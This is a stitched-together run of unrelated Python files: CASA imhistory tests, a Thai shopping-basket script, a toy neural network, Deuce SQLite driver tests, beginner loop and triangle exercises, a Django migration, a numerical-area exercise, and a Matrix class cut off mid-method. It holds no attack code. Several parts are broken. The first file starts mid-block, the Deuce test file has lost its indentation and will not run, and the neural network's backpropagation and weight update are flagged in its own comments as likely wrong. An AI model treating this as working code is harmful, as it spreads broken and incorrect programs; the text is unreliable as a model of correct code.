    from taskinit import *
    # NOTE(review): `tb` is not assigned in this branch — presumably the
    # star-import from taskinit provides it; confirm.
    myia = iatool()
import unittest
import shutil
# Resolve paths to the reference test data for each CASA generation.
if CASA6:
    casaimagepath = casatools.ctsys.resolve('image/ngc5921.clean.image')
    fitspath = casatools.ctsys.resolve('fits/1904-66_AIR.fits')
    #miriadpath = casatools.ctsys.resolve('visibilities/other/compact.vis')
else:
    # CASA 5: the casa-data-req tree may live inside or beside data/.
    if os.path.exists(os.environ.get('CASAPATH').split()[0] + '/data/casa-data-req'):
        casaimagepath = os.environ.get('CASAPATH').split()[0] + '/data/casa-data-req/image/ngc5921.clean.image'
        fitspath = os.environ.get('CASAPATH').split()[0] + '/data/casa-data-req/fits/1904-66_AIR.fits'
    else:
        casaimagepath = os.environ.get('CASAPATH').split()[0] + '/casa-data-req/image/ngc5921.clean.image'
        fitspath = os.environ.get('CASAPATH').split()[0] + '/casa-data-req/fits/1904-66_AIR.fits'
def change_perms(path):
    """Recursively set mode 0o777 on *path* and everything beneath it."""
    os.chmod(path, 0o777)
    for root, dirs, files in os.walk(path):
        for entry in dirs + files:
            os.chmod(os.path.join(root, entry), 0o777)
# Remember the active log file so tearDown can restore it after tests
# redirect casalog output to testlog.log.
logpath = casalog.logfile()
# Working copy of the reference image; the append-mode tests mutate its history.
imagecopy = 'imagecopy.image'
class imhistory_test(unittest.TestCase):
    """Requirement tests for the imhistory task (list/append modes)."""

    @classmethod
    def setUpClass(cls):
        # Work on a private copy so append-mode tests don't pollute the
        # shared reference image.
        shutil.copytree(casaimagepath, imagecopy)
        change_perms(imagecopy)

    def setUp(self):
        if not CASA6:
            default(imhistory)

    def tearDown(self):
        myia.done()
        tb.done()
        # Restore the original log file and remove per-test artifacts.
        casalog.setlogfile(logpath)
        if os.path.exists('testlog.log'):
            os.remove('testlog.log')
        if os.path.exists('basic'):
            shutil.rmtree('basic')

    @classmethod
    def tearDownClass(cls):
        shutil.rmtree(imagecopy)

    def test_takesCASAImage(self):
        ''' 1. test_takesCASAImage: Check that imhistory takes a CASA image file (*.image)'''
        messages = imhistory(imagecopy, mode='list', verbose=False)
        self.assertTrue(messages)

    def test_takesFITS(self):
        ''' 2. test_takesFITS: Check that imhistory takes a FITS file '''
        messages = imhistory(fitspath, mode='list', verbose=False)
        self.assertTrue(messages)

    def test_listModeVerbose(self):
        ''' 3. test_listModeVerbose: Check that the list mode with verbose on outputs to log file and outputs an array of strings '''
        casalog.setlogfile('testlog.log')
        historyMessages = imhistory(imagecopy, mode='list', verbose=True)
        self.assertTrue(len(historyMessages) > 0 and 'HISTORY' in open('testlog.log').read())

    def test_listModeNoVerbose(self):
        ''' 4. test_listModeNoVerbose: Check that the list mode with verbose off outputs an array of strings and does not output to the log file '''
        casalog.setlogfile('testlog.log')
        historyMessages = imhistory(imagecopy, mode='list', verbose=False)
        if CASA6:
            # NOTE(review): 41336 is an empirical log-size threshold — confirm
            # it still holds if the default log preamble changes.
            self.assertFalse(os.path.getsize("testlog.log") > 41336)
        else:
            self.assertFalse('HISTORY' in open('testlog.log').read())

    def test_appendModeNoDefaults(self):
        '''5. test_appendModeNoDefaults: Check that the append mode adds a string to the image history without use of default settings for message or origin '''
        casalog.setlogfile('testlog.log')
        success = imhistory(imagecopy, mode='append', message='TESTMESSAGEtest5', origin='TESTORIGINtest5')
        # Run imhistory again to output the history messages to the log to check if the message was added
        imhistory(imagecopy, mode='list', verbose=True)
        self.assertTrue('TESTMESSAGEtest5' in open('testlog.log').read() and 'TESTORIGINtest5' in open('testlog.log').read())

    def test_appendModeDefaultOrigin(self):
        ''' 6. test_appendModeDefaultOrigin: Check that append mode adds a string to the image history with the default origin setting '''
        casalog.setlogfile('testlog.log')
        success = imhistory(imagecopy, mode='append', message='TESTMESSAGEtest6')
        # Run imhistory again to output the history messages to the log to check if the message was added.
        if not CASA6:
            default(imhistory)
        imhistory(imagecopy, mode='list', verbose=True)
        self.assertTrue('imhistory' in open('testlog.log').read() and 'TESTMESSAGEtest6' in open('testlog.log').read())

    def test_correctReturnedParameters(self):
        ''' 7. test_correctReturnedParameters: Check that imhistory returns the expected parameters by looking for FILLM and BPASS '''
        casalog.setlogfile('testlog.log')
        historyMessages = imhistory(imagecopy, mode='list')
        # BUG FIX: the original asserted the truthiness of two generator
        # expressions, which is always True regardless of contents; any()
        # actually evaluates the membership tests.
        self.assertTrue(any('FILLM' in s for s in historyMessages)
                        and any('BPASS' in n for n in historyMessages))

    def test_noExistingMode(self):
        ''' 8. test_noExistingMode: Check that an exception is raised when a non-valid mode is given '''
        if CASA6:
            with self.assertRaises(Exception):
                imhistory(imagecopy, mode='fakeMode')
        else:
            # CASA 5 logs a SEVERE message instead of raising.
            casalog.setlogfile('testlog.log')
            imhistory(imagecopy, mode='fakemode')
            self.assertTrue('SEVERE' in open('testlog.log').read())

    # merged imhistory tests start here
    # ---------------------------------------------
    def test_imhistory(self):
        """Test general functionality"""
        shape = [2,3,4]
        imagename = "basic"
        myia.fromshape(imagename, shape)
        myia.done()
        h = imhistory(imagename, mode="list")
        self.assertTrue(len(h) == 3, "Incorrect history length")
        # NOTE(review): h[1:2] inspects only the second entry — confirm the
        # slice was not meant to be h[1:3].
        for hh in h[1:2]:
            print(hh)
            self.assertTrue("fromshape" in hh, "Incorrect message")
        msg = "fred"
        self.assertTrue(
            imhistory(imagename, mode="append", message=msg),
            "Error appending message"
        )
        h = imhistory(imagename, mode="list")
        self.assertTrue(len(h) == 4, "Incorrect history length")
        for hh in h[1:2]:
            self.assertTrue("fromshape" in hh, "Incorrect message")
        self.assertTrue(msg in h[3], "Incorrect appended message")
def suite():
    """Return the list of test classes for the CASA test runner."""
    return [imhistory_test]
# Main #
# Allow running this test module directly, outside the CASA test runner.
if __name__ == '__main__':
    unittest.main()
|
#โปรแกรมหยิบสินค้าใส่ตระกร้า
# Program: pick five items into a shopping basket, then list them.
print("++++++++++++++++++++++++++++++++++++++++++++++++++++++")
print("โปรดหยิบสินค้าใส่ตระกร้า")
print("++++++++++++++++++++++++++++++++++++++++++++++++++++++")
# Loop replaces the original five copy-pasted a..e variables; the prompts
# and the printed listing are byte-identical to the original output.
basket = []
for pick in range(1, 6):
    basket.append(input("หยิบสินค้าครั้งที่ {} :".format(pick)))
for pick, item in enumerate(basket, start=1):
    print('{}.'.format(pick), item)
def Main(operation):
    """Return operation + 1 when operation is 1..18, otherwise -1.

    Collapses the original 18-branch elif chain.  ``in range(1, 19)`` keeps
    the chain's equality semantics (e.g. True == 1 and 2.0 == 2 still match,
    while 2.5 or non-numeric values fall through to -1).
    """
    if operation in range(1, 19):
        return operation + 1
    return -1
|
from node import node
class network():
    """Simple fully-connected feed-forward network built from `node` objects."""

    #Constructor for the network
    def __init__(self, arch, start_weights):
        # arch: list of layer sizes; start_weights: flat list of initial weights.
        self.neurons = [] # Two dimensional array to hold all the neurons
        self.eta = 0.01 #Standard learning rate
        self.dimensions = arch # What the dimensions of each layer will be
        nextLayer = 1 # Easy access to next layer
        for i in range(len(self.dimensions)): # For the number of layers
            nodeArray = [] # Create new row
            for j in range(self.dimensions[i]): #Each node in that layer
                nodeWeights = [] #Weights for the node
                count = 0 #Keep track of which weight we are on
                if i < len(self.dimensions)-1: #Only do this if it isn't the output layer
                    for k in range(self.dimensions[nextLayer]):
                        # NOTE(review): the index j + dims[i]*count has no
                        # per-layer offset, so every layer reads from the
                        # start of start_weights — confirm intended.
                        nodeWeights.append(start_weights[j + (self.dimensions[i] * count)]) #Grab the right weights for the node
                        count += 1
                newNode = node() #Create new node and give it its weights
                newNode.set_weights(nodeWeights) #Set the weights of the node
                nodeArray.append(newNode) #Add it to the array for this layer
            nextLayer += 1
            self.neurons.append(nodeArray) #Add the row to the neurons matrix

    #Helper function to add ouput times the weights
    def calc(self,neuron, weightIndex):
        return neuron.output * neuron.weights[weightIndex]

    #Feed the input forward through the network
    def feedforward(self, xin):
        layers = len(self.dimensions)
        for i in range(self.dimensions[0]): #Set the output of the input layer to the input
            self.neurons[0][i].output = xin[i]
        #Calculate the output of each node in the network
        for layer in range(1, layers): #For each layer
            for node in range(self.dimensions[layer]): #For each node in that layer
                #Calculate the sum of output * weight for each neuron in the previous layer
                summation = sum([self.calc(neuron,node) for neuron in self.neurons[layer-1]])
                self.neurons[layer][node].fire(summation) #Fire that node and save the output for it
        fun = lambda x : x.output #Quick function to return the output of a node
        results = [ fun(x) for x in self.neurons[-1]] #Make a list of all the outputs of the last layer
        return results #Return the results of the output layer

    def backprop(self, xin, y):
        # NOTE(review): the loop variable `node` below shadows the imported
        # `node` class; harmless here but easy to trip over.
        layers = len(self.dimensions)
        results = self.feedforward(xin)
        #Set the Error of the output layer
        for output_node in range(self.dimensions[-1]):
            curr_node = self.neurons[-1][output_node]
            #Calculate the error
            curr_node.error = self.cost(curr_node.output, y[output_node]) * self.sig_prime(curr_node.zsum)
        #Go Backwards and calculate the error for the rest of the layers
        #Loop for each layer
        for layer in range(layers-2,-1,-1):
            #Loop for each node in that layer
            for node in range(self.dimensions[layer]):
                #Loop for each node in the next layer
                for next_node in range(self.dimensions[layer+1]):
                    # NOTE(review): the error is overwritten on each
                    # next_node iteration rather than summed over the next
                    # layer, and weight_error is appended without ever being
                    # cleared between backprop calls — both look like bugs;
                    # confirm against the intended algorithm.
                    self.neurons[layer][node].error = (self.neurons[layer][node].weights[next_node] * self.neurons[layer+1][next_node].error) * \
                        self.sig_prime(self.neurons[layer][node].zsum) #Calculate the error of the node
                    #Calculate the error of the weight connecting to the next node
                    self.neurons[layer][node].weight_error.append(self.neurons[layer][node].output * self.neurons[layer+1][next_node].error)
        #Changed the weights in the network based on the weight_error
        for layer in range(layers-1):
            for node in range(self.dimensions[layer]):
                for weight in range(len(self.neurons[layer][node].weights)):
                    # NOTE(review): standard SGD is w - eta * error; this
                    # computes (w - eta) * error — confirm intended.
                    self.neurons[layer][node].weights[weight] = (self.neurons[layer][node].weights[weight] - self.eta) * \
                        self.neurons[layer][node].weight_error[weight]
        trained_weights = [] #Newly trained weights
        weight_error = [] #Error of each weight
        #Grab weights and weight error
        for layer in range(layers-1):
            for connection in range(self.dimensions[layer+1]):
                for node in range(self.dimensions[layer]):
                    trained_weights.append(self.neurons[layer][node].weights[connection])
                    weight_error.append(self.neurons[layer][node].weight_error[connection])
        #Grab the output error
        output_error = [n.error for a in self.neurons for n in a] #double list comprehension
        return (output_error,weight_error,trained_weights)

    #Cost function
    def cost(self, activation, correct):
        # NOTE(review): a squared-error gradient is usually
        # (activation - correct); the product here grows with the target —
        # confirm intended.
        return activation * correct

    #Quick grab for sigmoid
    def sigmoid(self, x):
        # NOTE: this is the "fast sigmoid" x / (1 + |x|), not the logistic
        # function, despite the name.
        return x / (1 + abs(x))

    #Quick grab for sigmoid derivative
    def sig_prime(self, z):
        return self.sigmoid(z) * (1-self.sigmoid(z))
|
from pecan import conf
import os
from deuce.tests import FunctionalTest
from deuce.drivers.metadatadriver import MetadataStorageDriver, GapError,\
OverlapError
from deuce.drivers.sqlite import SqliteStorageDriver
from mock import MagicMock
class SqliteStorageDriverTest(FunctionalTest):
def create_driver(self):
    """Factory hook: build a fresh SQLite-backed metadata driver."""
    return SqliteStorageDriver()
def test_basic_construction(self):
    # Passes if the constructor itself does not raise.
    driver = SqliteStorageDriver()
def test_geneology(self):
    """Driver must be a MetadataStorageDriver subclass.

    NOTE(review): "geneology" is a typo for "genealogy"; left unrenamed to
    avoid breaking test discovery references.
    """
    driver = SqliteStorageDriver()
    assert isinstance(driver, MetadataStorageDriver)
    assert isinstance(driver, object)
def test_vault_statistics(self):
    """An untouched vault reports zero files and zero blocks."""
    driver = self.create_driver()
    hdr_data = {
        'x-project-id': self.create_project_id(),
        'x-auth-token': ''
    }
    self.init_context(hdr_data)
    vault_id = self.create_vault_id()
    # empty vault stats
    # TODO ** Create Vault Here **
    statistics = driver.get_vault_statistics(vault_id)
    main_keys = ('files', 'blocks')
    for key in main_keys:
        assert key in statistics.keys()
        assert 'count' in statistics[key].keys()
        assert statistics[key]['count'] == 0
    # TODO: Add files and check that founds match as expected
def test_db_health(self):
    """get_health() runs, and a mocked unhealthy response is passed through."""
    driver = self.create_driver()
    # First call only checks that the real implementation does not raise.
    retval = driver.get_health()
    driver.get_health = MagicMock(return_value=str('is not active.'))
    retval = driver.get_health()
    assert retval == str('is not active.')
def test_file_crud(self):
driver = self.create_driver()
hdr_data = {
'x-project-id': self.create_project_id(),
'x-auth-token': ''
}
self.init_context(hdr_data)
vault_id = self.create_vault_id()
file_id = self.create_file_id()
assert not driver.has_file(vault_id, file_id)
# Length of Non-existent file is 0
file_length = driver.file_length(vault_id, file_id)
assert (file_length == 0)
driver.create_file(vault_id, file_id)
assert driver.has_file(vault_id, file_id)
file_length = driver.file_length(vault_id, file_id)
assert (file_length == 0)
data = driver.get_file_data(vault_id, file_id)
driver.delete_file(vault_id, file_id)
assert not driver.has_file(vault_id, file_id)
def test_finalize_empty_file(self):
driver = self.create_driver()
hdr_data = {
'x-project-id': self.create_project_id(),
'x-auth-token': ''
}
self.init_context(hdr_data)
vault_id = self.create_vault_id()
file_id = self.create_file_id()
driver.create_file(vault_id, file_id)
assert not driver.is_finalized(vault_id, file_id)
driver.finalize_file(vault_id, file_id)
assert driver.is_finalized(vault_id, file_id)
file_length = driver.file_length(vault_id, file_id)
assert (file_length == 0)
def test_finalize_nonexistent_file(self):
driver = self.create_driver()
hdr_data = {
'x-project-id': self.create_project_id(),
'x-auth-token': ''
}
self.init_context(hdr_data)
vault_id = self.create_vault_id()
file_id = self.create_file_id()
assert not driver.has_file(vault_id, file_id)
retval = driver.finalize_file(vault_id, file_id)
file_length = driver.file_length(vault_id, file_id)
assert (file_length == 0)
try:
data = driver.get_file_data(vault_id, file_id)
except:
assert True
assert not driver.has_file(vault_id, file_id)
assert not driver.is_finalized(vault_id, file_id)
def test_block_crud(self):
driver = self.create_driver()
hdr_data = {
'x-project-id': self.create_project_id(),
'x-auth-token': ''
}
self.init_context(hdr_data)
vault_id = self.create_vault_id()
block_id = self.create_block_id()
size = 4096
assert not driver.has_block(vault_id, block_id)
try:
size = driver.get_block_data(vault_id, block_id)['blocksize']
except:
assert True
driver.register_block(vault_id, block_id, size)
assert driver.has_block(vault_id, block_id)
self.assertEqual(driver.get_block_data(vault_id,
block_id)['blocksize'], size)
# Call again, shouldn't throw
driver.register_block(vault_id, block_id, size)
driver.unregister_block(vault_id, block_id)
assert not driver.has_block(vault_id, block_id)
assert not driver.has_block(vault_id, 'invalidid')
def test_file_assignment_no_block(self):
driver = self.create_driver()
hdr_data = {
'x-project-id': self.create_project_id(),
'x-auth-token': ''
}
self.init_context(hdr_data)
vault_id = self.create_vault_id()
file_id = self.create_file_id()
self.assertEqual(driver.has_file(vault_id,
file_id), False)
driver.create_file(vault_id, file_id)
self.assertEqual(driver.has_file(vault_id, file_id), True)
driver.assign_block(vault_id, file_id, 'block_a', 0)
driver.assign_block(vault_id, file_id, 'block_b', 1024)
with self.assertRaises(GapError) as ctx:
driver.finalize_file(vault_id, file_id, 2048)
self.assertEqual(ctx.exception.vault_id, vault_id)
self.assertEqual(ctx.exception.file_id, file_id)
self.assertEqual(ctx.exception.startpos, 0)
self.assertEqual(ctx.exception.endpos, 2048)
self.assertEqual(driver.is_finalized(vault_id, file_id),
False)
def test_file_assignment_registration(self):
driver = self.create_driver()
hdr_data = {
'x-project-id': self.create_project_id(),
'x-auth-token': ''
}
self.init_context(hdr_data)
vault_id = self.create_vault_id()
file_id = self.create_file_id()
self.assertEqual(driver.has_file(vault_id, file_id), False)
driver.create_file(vault_id, file_id)
self.assertEqual(driver.has_file(vault_id, file_id), True)
# Create one block before assigning and one block after
driver.register_block(vault_id, 'block_a', 1024)
driver.assign_block(vault_id, file_id, 'block_a', 0)
driver.assign_block(vault_id, file_id, 'block_b', 1024)
driver.register_block(vault_id, 'block_b', 1024)
self.assertEqual(driver.is_finalized(vault_id, file_id), False)
driver.finalize_file(vault_id, file_id, 2048)
self.assertEqual(driver.is_finalized(vault_id, file_id),
True)
def test_file_assignment(self):
driver = self.create_driver()
hdr_data = {
'x-project-id': self.create_project_id(),
'x-auth-token': ''
}
self.init_context(hdr_data)
vault_id = self.create_vault_id()
file_id = self.create_file_id()
normal_block_size = 333
gap_block_size = 222
overlap_block_size = 444
# GAP at front (miss the 1st block)
num_blocks = int(0.5 * conf.api_configuration.max_returned_num)
block_ids = ['block_{0}'.format(id) for id in range(1, num_blocks)]
offsets = [x * normal_block_size for x in range(1, num_blocks)]
blockpairs = dict(zip(block_ids, offsets))
# Create a file
driver.create_file(vault_id, file_id)
file_length = driver.file_length(vault_id, file_id)
assert (file_length == 0)
# Assign each block
for bid, offset in blockpairs.items():
driver.assign_block(vault_id, file_id, bid, offset)
assert not driver.is_finalized(vault_id, file_id)
# GAPs (gap at front)
for bid, offset in blockpairs.items():
driver.register_block(vault_id, bid, gap_block_size)
with self.assertRaises(GapError) as ctx:
res = driver.finalize_file(vault_id, file_id)
self.assertEqual(ctx.exception.vault_id, vault_id)
self.assertEqual(ctx.exception.file_id, file_id)
self.assertEqual(ctx.exception.startpos, 0)
self.assertEqual(ctx.exception.endpos, 333)
assert not driver.is_finalized(vault_id, file_id)
# OVERLAPs (gap at front)
for bid, offset in blockpairs.items():
driver.unregister_block(vault_id, bid)
driver.register_block(vault_id,
bid, overlap_block_size)
with self.assertRaises(GapError) as ctx:
res = driver.finalize_file(vault_id, file_id)
self.assertEqual(ctx.exception.vault_id, vault_id)
self.assertEqual(ctx.exception.file_id, file_id)
self.assertEqual(ctx.exception.startpos, 0)
self.assertEqual(ctx.exception.endpos, 333)
assert not driver.is_finalized(vault_id, file_id)
# put back the missed block at the front
# Create a gap in the middle
block_ids.insert(0, 'block_0')
blockpairs['block_0'] = 0
driver.assign_block(vault_id, file_id, 'block_0', 0)
for bid, offset in blockpairs.items():
driver.unregister_block(vault_id, bid)
driver.register_block(vault_id, bid, gap_block_size)
with self.assertRaises(GapError) as ctx:
res = driver.finalize_file(vault_id, file_id)
self.assertEqual(ctx.exception.vault_id, vault_id)
self.assertEqual(ctx.exception.file_id, file_id)
self.assertEqual(ctx.exception.startpos, 222)
self.assertEqual(ctx.exception.endpos, 333)
assert not driver.is_finalized(vault_id, file_id)
# Create a overlap in the middle
for bid, offset in blockpairs.items():
driver.unregister_block(vault_id, bid)
driver.register_block(vault_id,
bid, overlap_block_size)
with self.assertRaises(OverlapError) as ctx:
res = driver.finalize_file(vault_id, file_id)
self.assertEqual(ctx.exception.vault_id, vault_id)
self.assertEqual(ctx.exception.file_id, file_id)
self.assertEqual(ctx.exception.block_id, 'block_1')
self.assertEqual(ctx.exception.startpos, 333)
self.assertEqual(ctx.exception.endpos, 444)
assert not driver.is_finalized(vault_id, file_id)
# Fix and back to normal
for bid, offset in blockpairs.items():
driver.unregister_block(vault_id, bid)
driver.register_block(vault_id, bid, normal_block_size)
# gap at the eof.
with self.assertRaises(GapError) as ctx:
res = driver.finalize_file(vault_id, file_id, file_size=14000)
self.assertEqual(ctx.exception.vault_id, vault_id)
self.assertEqual(ctx.exception.file_id, file_id)
self.assertEqual(ctx.exception.startpos, 13320)
self.assertEqual(ctx.exception.endpos, 14000)
assert not driver.is_finalized(vault_id, file_id)
# overlap at the eof.
with self.assertRaises(OverlapError) as ctx:
res = driver.finalize_file(vault_id, file_id, file_size=12900)
self.assertEqual(ctx.exception.vault_id, vault_id)
self.assertEqual(ctx.exception.file_id, file_id)
self.assertEqual(ctx.exception.startpos, 12900) # end of file
self.assertEqual(ctx.exception.endpos, 13320) # Overlap past EOF
assert not driver.is_finalized(vault_id, file_id)
# This should now succeed and the file
# should be successfully finalized
res = driver.finalize_file(vault_id, file_id, file_size=13320)
assert not res
assert driver.is_finalized(vault_id, file_id)
file_length = driver.file_length(vault_id, file_id)
assert (file_length == 13320)
# Now create a generator of the files. The output
# should be in the same order as block_ids
offset = 0
limit = 4
retgen = \
driver.create_file_block_generator(vault_id, file_id, offset,
limit)
fetched_blocks = list(retgen)
# The driver actually returns limit+1 so that any
# caller knows that the list is truncated.
self.assertEqual(len(fetched_blocks), limit)
# -1 to exclude the trailer
for x in range(0, limit):
self.assertEqual(fetched_blocks[x][0], block_ids[x])
# Add 2 more blocks that aren't assigned.
driver.register_block(vault_id, 'unassigned_1', 1024)
driver.register_block(vault_id, 'unassigned_2', 1024)
num_blocks += 2
# Now create a generator of the files. The output
# should be in the same order as block_ids
# Test driver branch with a given marker
gen = driver.create_block_generator(vault_id, marker=0)
# Test driver branch with a default marker
gen = driver.create_block_generator(vault_id)
fetched_blocks = list(gen)
self.assertEqual(len(fetched_blocks), num_blocks)
# Now try file_block_generator with no limit
# Force returning an empty list by an unreasonable offset.
retgen = \
driver.create_file_block_generator(
vault_id, file_id, offset=999999999, limit=None)
# A good set.
retgen = \
driver.create_file_block_generator(
vault_id, file_id, offset=None, limit=None)
output = sorted(list(retgen))
prep = sorted(list(x for x in blockpairs.items()))
self.assertEqual(output, prep)
def test_file_generator(self):
# Adds a bunch of files and checks the generator
driver = self.create_driver()
hdr_data = {
'x-project-id': self.create_project_id(),
'x-auth-token': ''
}
self.init_context(hdr_data)
vault_id = self.create_vault_id()
num_files = 10
# Create a list of 100 files
file_ids = [self.create_file_id() for _ in range(0, num_files)]
for file_id in file_ids:
assert not driver.has_file(vault_id, file_id)
out_id = driver.create_file(vault_id, file_id)
self.assertEqual(out_id, file_id)
assert driver.has_file(vault_id, file_id)
# None of the files have been finalized so we should
# get none back
gen = driver.create_file_generator(vault_id)
output = list(gen)
self.assertEqual(output, [])
# Now finalize the files and try to get them
for file_id in file_ids:
driver.finalize_file(vault_id, file_id)
gen = driver.create_file_generator(vault_id)
# Convert to a list of file ids.
output = list(gen)
# Why sorted? Deuce returns file ids sorted, but the list
# of file ids that we generated were not sorted when we
# created them above.
self.assertEqual(output, sorted(file_ids))
# Now try with markers
gen = driver.create_file_generator(vault_id,
marker=sorted(file_ids)[2], limit=3)
output = list(gen)
self.assertEqual(len(output), 3) # Limited query to 3
# We should be able to compare the list of
# file ids here with the ones that come from
# the other list
target_list = sorted(file_ids)[2:5]
self.assertEqual(target_list, output)
|
# -*- coding:utf-8 -*-
# Example 5.20, drill 3: advanced (Python 2 — uses print statements)
a = 1
print 'Cheers! '
# Outer loop: two passes (a = 1, 2).
while a<3:
    c = a
    print a
    b = 1
    # Inner loop: add a into c three times (b = 1..3), so c ends at 4*a.
    while b<4:
        c += a
        print c
        if a==1 and c>=4:
            print 'Let\'s do this some more! '
        else:
            if a==2 and c>=8:
                print 'Who do we appreciate?'
        b += 1
    a += 1
|
def main():
    """Print the sum of all integers from 10 to 1,000 inclusive."""
    # sum(range(...)) replaces the original manual while-loop accumulator;
    # range's stop is exclusive, hence 1001.
    print(sum(range(10, 1001)))


if __name__ == '__main__':
    main()
|
# ANSI colour escape codes used to highlight the output.
cores = {'azul': '\033[1;34m',
         'vermelho': '\033[1;31m',
         'amarelo': '\033[1;33m', 'limpa': '\033[m',
         'branco': '\033[97m',
         'magenta': '\033[1;35m',
         'black': '\033[1;30;107m'}
print(' {}MEDIDAS E CLASSIFICAÇÕES DE TRIANGULOS{}'.format(cores['magenta'], cores['limpa']))
a = float(input('1º Segmento: '))
print('=='*25)
b = float(input('2° Segmento: '))
print('=='*26)
c = float(input('3° Segmento: '))
# Triangle inequality: each side must be shorter than the sum of the others.
# (The unused, incorrectly-negated `nformar` flag was removed.)
pformar = a < b+c and b < c+a and c < a+b
if pformar and a != b and b != c and c != a:
    # All three sides different -> scalene.
    print('{}Os segmentos PODEM formar um triângulo!{}'.format(cores['azul'], cores['limpa']))
    print('{}O triangulo é ESCALENO{}!'.format(cores['vermelho'], cores['limpa']))
elif pformar and a == b and b == c and c == a:
    # All three sides equal -> equilateral.
    print('Os segmentos PODEM formar um triângulo!')
    print('{}O triangulo é EQUILÁTERO{}'.format(cores['amarelo'], cores['limpa']))
elif pformar and (a == b or b == c or c == a):
    # Exactly two sides equal (the equilateral case was caught above);
    # this single branch replaces three duplicated elif branches.
    print('{}Os segmentos PODEM formar um triângulo!{}'.format(cores['branco'], cores['limpa']))
    print('{}O triangulo é o ISÓSCELES!{}'.format(cores['magenta'], cores['limpa']))
else:
    print('{}Os segmentos NÃO PODEM formar um triângulo!{}'.format(cores['black'], cores['limpa']))
|
# Generated by Django 3.0.5 on 2020-04-30 15:43
from django.conf import settings
from django.db import migrations
import django.db.models.deletion
import django_currentuser.db.models.fields
import django_currentuser.middleware
class Migration(migrations.Migration):
    """Auto-generated migration: adds created_by/updated_by audit fields
    (auto-filled with the current authenticated user) to the book model."""
    initial = True
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('book', '0002_book_categories'),
    ]
    operations = [
        migrations.AddField(
            model_name='book',
            name='created_by',
            field=django_currentuser.db.models.fields.CurrentUserField(default=django_currentuser.middleware.get_current_authenticated_user, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_by_book_books', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='book',
            name='updated_by',
            field=django_currentuser.db.models.fields.CurrentUserField(default=django_currentuser.middleware.get_current_authenticated_user, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_by_book_books', to=settings.AUTH_USER_MODEL),
        ),
    ]
|
import math
def f(x):
    """Upper boundary curve of the figure: x**4/500 - x**2/200 - 3/250."""
    quartic = x**4 / 500.0
    quadratic = x**2 / 200.0
    return quartic - quadratic - 3 / 250.0
def g(x):
    """Lower boundary curve of the figure: -x**3/30 + x/20 + 1/6."""
    cubic = x**3 / 30.0
    linear = x / 20.0
    return -cubic + linear + 1 / 6.0
n = 0.00001 # width of the measuring rectangle (integration step)
lewo = 2 # left edge of the figure (NOTE(review): assigned but never used)
gora = f(10) # top edge of the figure
dol = g(10) # bottom edge of the figure
p1 = 0 # area of the upper region of the figure
p2 = 0 # area of the lower region of the figure
# Task 1: remaining material area = bounding rectangle minus the two regions.
x = 2
# NOTE(review): x is incremented BEFORE f(x)/g(x) are sampled, so each
# rectangle uses the right-hand edge — confirm this is the intended scheme.
while x <= 10:
    x += n
    p1 += n * (gora - f(x))
    p2 += n * (abs(dol) - abs(g(x)))
szer = 8 # rectangle width (x from 2 to 10)
wys = abs(gora) + abs(dol) # rectangle height
p = wys * szer
print('Pozostała powierzchnia materiału: ', round(p - (p1+p2), 3))
# Task 2: arc lengths of both curves, approximated by chords of width n.
n = 8/1000
kf = 0 # accumulated length of curve f
kg = 0 # accumulated length of curve g
x = 2
while x <= 10:
    fa = [x, f(x)]
    fb = [x+n, f(x+n)]
    ga = [x, g(x)]
    gb = [x+n, g(x+n)]
    # Euclidean distance between consecutive sample points.
    kf += ( (fa[0]-fb[0])**2 + (fa[1]-fb[1])**2)**(1/2)
    kg += ( (ga[0]-gb[0])**2 + (ga[1]-gb[1])**2)**(1/2)
    x += n
obw = kf + kg + 2*szer + wys # total perimeter to be taped
print('Należy zakupić:',math.ceil(obw),'m taśmy')
# Task 3: total length of strips cut from the leftover material,
# sampled every 0.25 from x = 10 down to 0.
n = 0.25
x = 10
dlugosc = 0
while x >= 0:
    x -= n
    dlugosc += math.floor(f(x) + abs(g(x)))
print('Długość pasów wyciętych z pozostałości materiału:',dlugosc,'m')
|
#!/usr/bin/env/ python3.6
# HW #L5.1 Matrix
class Matrix:
    """List-of-lists matrix supporting construction from rows or random
    fill, indexing, +, -, * (matrix and scalar), equality, transposition
    and symmetry checks."""
    # Kept as class attributes (as in the original design) so instances
    # reach them via self.random / self.reduce.
    import random
    from functools import reduce

    def __init__(self, *args) -> None:
        """Create a matrix.

        One argument: a list of equal-length rows.
        Two arguments: (rows, columns) -> random ints in [0, 100].

        :raises ValueError: on ragged rows or a wrong argument count.
        """
        if len(args) == 1:
            matrix = args[0]
            # A consistent matrix has exactly one distinct row length.
            if len(set(len(row) for row in matrix)) == 1:
                self.matrix = matrix
                self.rows = len(self.matrix)
                self.columns = len(self.matrix[0])
            else:
                raise ValueError('Inconsistent matrix. Inequality of row lengths.')
        elif len(args) == 2:
            self.rows = args[0]
            self.columns = args[1]
            # random.sample draws distinct values within each row.
            self.matrix = [self.random.sample(range(101), self.columns)
                           for _ in range(self.rows)]
        else:
            raise ValueError('Wrong number of arguments.')

    def __str__(self):
        """Single-line string form (the raw list of rows)."""
        self.__string = str(self.matrix)
        return self.__string

    def __getitem__(self, pos):
        """Read the element at pos = (row, column)."""
        row, column = pos
        return self.matrix[row][column]

    def __setitem__(self, pos, value):
        """Write the element at pos = (row, column)."""
        row, column = pos
        self.matrix[row][column] = value

    def __repr__(self):
        """One text line per matrix row."""
        self.__rstring = '\n'.join([str(row) for row in self.matrix])
        return self.__rstring

    def __add__(self, other):
        """Element-wise sum of two same-shaped matrices.

        :raises ValueError: if shapes differ.
        """
        if other.rows == self.rows and other.columns == self.columns:
            return Matrix([list(map(lambda x, y: x + y,
                                    self.matrix[row],
                                    other.matrix[row])) for row in range(self.rows)])
        else:
            raise ValueError('Matrix sizes are not equal.')

    def __sub__(self, other):
        """Element-wise difference of two same-shaped matrices.

        :raises ValueError: if shapes differ. (The original only printed
            'Make exception here' and silently returned None.)
        """
        if other.rows == self.rows and other.columns == self.columns:
            return Matrix([list(map(lambda x, y: x - y,
                                    self.matrix[row],
                                    other.matrix[row])) for row in range(self.rows)])
        else:
            raise ValueError('Matrix sizes are not equal.')

    def __mul__(self, other):
        """Matrix product (Matrix operand) or scalar product (int operand).

        :raises ValueError: on dimension mismatch or unsupported type.
        """
        if isinstance(other, Matrix):
            if self.columns == other.rows:
                other = other.transpose()
                result = list()
                for row in range(self.rows):
